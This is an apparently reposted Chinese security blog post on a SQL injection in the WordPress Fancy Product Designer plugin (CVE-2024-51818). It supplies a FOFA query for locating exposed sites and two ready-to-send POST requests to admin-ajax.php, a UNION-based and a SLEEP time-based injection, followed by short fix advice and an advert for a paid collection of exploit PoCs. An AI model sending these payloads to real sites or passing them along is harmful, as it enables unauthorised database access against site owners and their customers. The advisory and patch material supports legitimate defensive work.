文章总结： 该文档披露了WordPressFancyProductDesigner插件中的SQL注入漏洞CVE-2024-51818，攻击者可通过向admin-ajax.php发送恶意构造的product_id参数执行数据库查询。文档提供了FOFA搜索引擎识别语句、两种漏洞复现PoC包括时间延迟注入、以及修复建议如限制接口访问或升级版本。 综合评分： 78 文章分类： 漏洞分析,WEB安全,渗透测试,应急响应,解决方案

WordPress Fancy Product Designer插件Sql注入漏洞（CVE-2024-51818）

原创

北雪网络安全 北雪网络安全

北雪网络安全

2026年5月3日 07:37 山东

在小说阅读器读本章

去阅读

本文章所描述的内容仅供网络安全学习使用，任何人不允许学到技术内容进行非法系统测试，作者不对任何学习文章并进行非法操作的行为负责，由本人自己承担后果，本文章仅供技术学习。

01

更多内容

网络安全学习知识库每日添加最新漏洞并提供python与 nuclei 批量探测脚本：https://pc.fenchuan8.com/#/index?forum=110296

02

搜索引擎

Fofa：body=”wp-content/plugins/fancy-product-designer” && icon_hash=”1198047028″

03

漏洞复现

POST /wp-admin/admin-ajax.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost:your-ip
action=fpd_load_product&product_id=1 UNION ALL SELECT CONCAT(0x71626a7071,0x7544744f72516f7744634c4b63785867625066516a655578577270794441765a7350664d4c7a6c74,0x716b767071),NULL,NULL,NULL,NULL,NULL,NULL---

POST /wp-admin/admin-ajax.php HTTP/1.1Content-Type:application/x-www-form-urlencodedHost:your-ip
action=fpd_load_product&product_id=1 AND (SELECT 2808 FROM (SELECT(SLEEP(5)))CSPH)

04

自查工具

05

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、升级至安全版本

06

内部圈子

🛠️ 【知名漏洞实战圈，纯干货】🛠️

还在找公开漏洞POC而烦恼？还在为漏洞不会验证而发愁？还在为发现不了漏洞而自卑？这里漏洞圈子解决你的困惑！ 目前已更新poc数量2500+

🎯 适用场景

▫️渗透测试▫️企业漏洞自查▫️攻防演练▫️安全服务▫️合规运营****

⚠️ 重要声明：

▫️仅限合法授权测试，严禁违规使用

▫️虚拟资源服务，购买后不接受任何形式退款

        ▫️付款前请评估需求，慎重考虑

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北雪网络安全 北雪网络安全 北雪网络安全《WordPress Fancy Product Designer插件Sql注入漏洞（CVE-2024-51818）》